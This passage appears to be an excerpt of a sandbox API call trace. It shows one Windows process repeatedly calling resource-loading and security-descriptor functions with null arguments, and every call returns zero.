pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.923] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.923] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.923] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.924] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.924] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.924] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.924] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.924] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.924] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.924] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.924] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.924] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.924] LockResource (hResData=0x0) returned 0x0 [0069.924] FreeResource (hResData=0x0) returned 0 [0069.924] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.924] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.924] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.925] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.925] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.925] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.925] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.925] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.925] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.925] FreeResource (hResData=0x0) returned 0 [0069.925] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.925] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.925] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.926] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.926] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.926] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.926] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.926] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.926] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.926] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.926] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.926] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.926] LockResource (hResData=0x0) returned 0x0 [0069.926] FreeResource (hResData=0x0) returned 0 [0069.926] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.927] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.927] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.927] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.927] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.927] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.927] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.927] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.927] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.927] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.927] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.927] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.927] LockResource (hResData=0x0) returned 0x0 [0069.927] FreeResource (hResData=0x0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.928] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.928] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.928] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.928] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.928] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.928] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.928] LockResource (hResData=0x0) returned 0x0 [0069.928] FreeResource (hResData=0x0) returned 0 [0069.928] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.928] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.928] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.928] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.928] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.929] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.929] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.929] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.929] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.929] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.929] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.929] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.929] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.929] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.929] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.929] LockResource (hResData=0x0) returned 0x0 [0069.929] FreeResource (hResData=0x0) returned 0 [0069.930] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.930] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.930] IsNLSDefinedString (Function=0x0, dwFlags=0x0, 